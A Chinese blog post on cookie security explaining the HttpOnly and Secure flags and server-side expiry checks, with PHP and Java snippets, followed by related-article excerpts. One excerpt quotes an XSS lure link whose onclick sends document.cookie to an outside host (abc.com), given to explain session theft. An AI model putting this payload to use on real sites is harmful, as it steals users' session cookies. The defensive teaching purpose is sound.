Web安全之Cookie管理

最新推荐文章于 2024-09-06 20:38:19 发布
最新推荐文章于 2024-09-06 20:38:19 发布
阅读量2.1k 收藏 3
点赞数 1
分类专栏: Web安全 文章标签: cookie 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mevicky/article/details/48310993
版权

前面我们讲到过XSS攻击,其原理就是利用脚本读取用户的Cookie从而造成用户信息泄露。这里我们要介绍Cookie的几个关键属性值HttpOnly、Secure及其用法。

HttpOnly

该属性值的作用就是防止Cookie值被页面脚本读取。一个没有设置HttpOnly的Cookie:

setcookie('name','lf');

效果如下:
这里写图片描述

这段代码就可能被攻击者用脚本来获取,所以我们应该为Cookie添加HttpOnly属性如下:

setcookie('name','lf');
setcookie('age','23',NULL,NULL,NULL,NULL,TRUE);//HttpOnly属性为true

效果如下:
这里写图片描述

切记HttpOnly属性只是增加了攻击者的难度,不能达到完全防御XSS攻击。

Secure

接下来要介绍的就是Secure属性了。给Cookie设置该属性时,只有在https协议下访问的时候,浏览器才会发送该Cookie。

还是刚才的代码:

setcookie('age','23',NULL,NULL,NULL,NULL,TRUE);//HttpOnly属性为true

如果我们仅仅设置了HttpOnly属性,只能防止Cookie不被脚本获取,却不能防止Cookie被攻击者通过抓包来读取,如果加上了Secure属性,就算攻击者窃听网络,也无法获取用户明文Cookie了。

setcookie('gf','tyq',Null,Null,Null,TRUE,Null);//Secure属性为true

效果如下:
这里写图片描述

有效期

最后来说说Cookie的有效期,刚才的代码并没有在服务器中设置强制超时时间,所以万一用户获取到用户的Cookie后,就可以一直使用用户身份登录。
我们在设置Cookie认证的时候,需要加入两个时间,一个是“即使一直在活动,也要失效”的时间,一个是“长时间不活动的失效时间”。并在Web应用中,首先判断两个时间是否已超时,再执行其他操作。

       // 判断会员的cookie是否过期
        if (isLogin) {
            String timeStampStr = (String) map.get(UserAuthenticationContext.TIMESTAMP);
            long loginTime = 0;
            try {
                loginTime = Long.parseLong(timeStampStr);
            } catch (NumberFormatException e) {
                if (logger.isInfoEnabled()) {
                    logger.info(" loginId: " + usr.getLoginId() + " timestamp has exception " + timeStampStr);
                }
            }
            long now = System.currentTimeMillis() / 1000;
            if (now - loginTime > UserAuthenticationContext.COOKIE_VALIDITY) {
                usr.setAuthenticated(false, true);
                if (logger.isInfoEnabled()) {
                    logger.info("loginId: " + usr.getLoginId() + " loginTime: " + loginTime + " nowTime: " + now);
                }
            }
        }

最后形成保护Web应用的综合防御。

布瑞泽的童话
关注
专栏目录
浅谈cookie安全
课嗨教育的专栏
04-03 2495
0x01 简介 1. cookie简述 由于HTTP协议是无状态的,而服务器端的业务必须是要有状态的。Cookie诞生的最初目的是为了存储web中的状态信息,以方便服务器端使用。比如判断用户是否是第一次访问网站。目前最新的规范是RFC 6265,它是一个由浏览器服务器共同协作实现的规范。服务端可以通过http的响应对cookie进行增加、修改和删除。而在客户端中也可以通过脚本语言如:JavaScript对其进行同样的操作。 2. cookie的组成结构 Cookie的字段一般分为: [name]
Cookie安全
weixin_33928137的博客
02-20 163
Cookie安全 Cookie是一个神奇的机制,同域内浏览器中发出的任何一个请求都会带上Cookie,无论请求什么资源,请求时,Cookie出现在请求头的Cookie字段中。服务端响应头的Set-Cookie字段可以添加、修改和删除Cookie,大多数情况下,客户端通过JavaScript也可以添加、修改和删除Cookie。 由于这样的机制,Cookie经常被用来存储用户的会话信息,比如,用户...
剖析Cookie的工作原理及其安全风险
最新发布
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
09-06 1564
Cookie,也称为HTTP cookieweb cookie、互联网cookie或浏览器cookie,是一种用于在用户浏览网站时识别用户并为其准备网页的小型数据片段。它允许Web服务器跟踪用户的浏览历史并响应之前披露的偏好。可以增强用户体验,并基于过去的行为启用个性化内容。Cookie通常以键值对的形式存储在用户的硬盘上,是一个二进制的Sqlite文件,Windows系统中Chrome浏览器的Cookie默认位置一般为。Cookie有多种类型,包括会话cookie和持久cookie
web网络安全---cookie
罗罗的1024
01-02 466
什么是Cookie 由于HTTP是一种无状态的协议,服务器单从网络连接上无从知道客户身份。怎么办呢?就给客户端们颁发一个通行证吧,每人一个,无论谁访问都必须携带自己通行证。这样服务器就能从通行证上确认客户身份了。这就是Cookie的工作原理。 Cookie具有不可跨域名性 提问:很多网站都会使用Cookie。例如,Google会向客户端颁发Cookie,Baidu也会向客户端颁发Cookie。那浏览器访问Google会不会也携带上Baidu颁发的Cookie呢?或者Google能不能修改Baidu颁发的C
cookie安全
----------------
12-13 569
跨站点脚本XSS使用跨站点脚本技术可以窃取cookie。当网站允许使用javascript操作cookie的时候,就会发生攻击者发布恶意代码攻击用户的会话,同时可以拿到用户的cookie信息。例子: <a href="#" onclick=`window.location=http://abc.com?cookie=${docuemnt.cookie}`>领取红包</a>当用户点击这个链接的时候,
有关Cookie安全常识
向远处看的专栏
04-28 1300
Cookies现在经常被大家提到,那么到底什么是Cookies,它有什么作用呢?Cookies是一种能够让网站服务器把少量数据储存到客户端的硬盘或内存,或是从客户端的硬盘读取数据的一种技术。Cookies是当你浏览某网站时,由Web服务器置于你硬盘上的一个非常小的文本文件,它可以记录你的用户ID、密码、浏览过的网页、停留的时间等信息。当你再次来到该网站时,网站通过读取Cookies,得知你的相关信
web技术之cookie讲解
08-31
Cookie的主要功能包括会话管理、个性化设置、跟踪用户行为等。 Cookie的工作原理主要包括以下几个步骤: 1. 服务器通过HTTP响应头中的Set-Cookie字段将Cookie发送给浏览器。 2. 浏览器接收并存储Cookie,通常按照...
Web应用安全:HTTPCookie的缺点.pptx
06-17
Web应用程序中,HTTPCookie被广泛用于会话管理,但是不恰当的使用方式可能会引入严重的安全风险。本文将深入探讨Cookie的两大安全隐患类别:用途不当和输出方法不当,并提供相关的解决方案。 一、Cookie的用途...
Web应用安全:HTTPCookie的作用.pptx
06-17
Cookie与会话管理 由于 HTTP 协议的无状态性,服务器端不能保存客户端的状态。但是,在应用程序中,保持客户端的状态却是相当常见的需求。 比如,在线购物网站中的“购物车”就是一个典型的案例。购物车记住了用户在...
白帽子讲web安全_WEB安全_
09-29
《白帽子讲Web安全》是一本深入探讨网络安全,特别是针对Web应用安全的专业书籍。在互联网高速发展的今天,数据安全和个人隐私的重要性不言而喻。Web安全不仅关乎企业信息安全,也直接影响到每一个网络用户的日常...
易语言cookie管理
07-20
了解易语言的Cookie管理机制对于开发Web应用程序至关重要,特别是对于那些需要持久化用户状态或实现会话管理的应用。通过熟练掌握这一技能,开发者可以构建更高效、更用户友好的网络应用。在实际编程中,还需要考虑...
最全如何安全的处理cookie,不让cookie被利用
10-12
史上最全如何安全的处理cookie,不让cookie被利用最全如何安全的处理cookie
Cookie安全性问题
01-19 521
Cookie的目的是为用户带来方便,为网站带来增值,一般情况下不会造成严重的安全威胁。Cookie文件不能作为代码执行,也不会传送病毒,它为用户所专有并只能由创建它的服务器来读取。另外,浏览器一般只允许存放300个Cookie,每个站点最多存放20个Cookie,每个Cookie的大小限制为4...
Cookie 安全
allway2的博客
09-05 1904
攻击者将会话标识符强制输入目标用户的浏览器,然后等待用户登录。出于本文的目的,请注意计时攻击是可能的,因为浏览器在跨站点请求中包含会话 cookie。在本文中,您将了解有关 HTTP cookie 安全性、什么是与 cookie 相关的攻击以及如何防御它们的所有信息。在 http:// 或 ws:// 请求中包含使用属性设置的 cookie,只有 https:// 和 ws://。请注意会话 cookie 是如何通过未加密的连接传输的,该会话 cookie 仅应在 HTTPS 页面上使用。
cookie安全
qq_43936524的博客
05-16 642
文章目录cookie概述cookie的储存cookie的属性cookie安全问题httponly无session验证cookie覆盖攻击 cookie概述 由于HTTP协议是无状态的,而服务器端的业务必须是要有状态的。Cookie诞生的最初目的是为了存储web中的状态信息,以方便服务器端使用。比如判断用户是否是第一次访问网站。 cookie的流程如下图所示。第一次访问后服务端铜鼓set-cookie报文头在客户端设置一个cookie字段。之后客户端每次访问cookie指定域名的地址都会在请求中加上cook
WEB安全实战(四)关于 Cookie
紫羽风的博客
10-31 3277
前言 这几天中,一直再跟漏洞打交道,而在这些漏洞中,出现的最多的就是 Cookie 和 Session 了。这篇文章就简单的介绍一些 Cookie 中最常用的四个属性。也算是为后续的文章做一个铺垫吧。 废话不多说,直接进入正题。 属性 Path(路径) Path 是指定与 Cookie 关联的 Web 页。它的值可以是一个目录,
总结Cookie安全安全风险和防范建议
Neonline254的博客
05-23 4187
本文从安全工程师的视角总结了Cookie技术和其安全问题,包括Cookie技术的介绍、所带来的安全问题及对应的防范手段和建议,希望能给想了解Cookie安全的你带来一些帮助。
web安全问题-cookie
daxiangya6845的博客
10-24 114
web安全问题 cookie 1.cookies只能设置过期 不能删除 <script> now.toGMTString() => 事件可以用来设置cookie document.cookie("aaa=1,expires=Sun, 07 May 2017 xxxxx") </script> 2.Cookies-登录用户凭证 用户ID 用户ID + 签...
Cookie安全性分析
qq_37158580的博客
04-22 4953
浅谈cookie安全性 摘要 HTTP State Management Mechanism(HTTP状态管理机制)一文中,定义了HTTP Cookie和Set-Cookie头字段。HTTP服务器利用这种头字段,在HTTP用户代理(浏览器)中存储当前状态,使得在大多数无状态的HTTP协议下,服务器可以维持一个有状态的回话。虽然,在安全性和隐私性上,cookie有许多历史性的不合理处,但是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值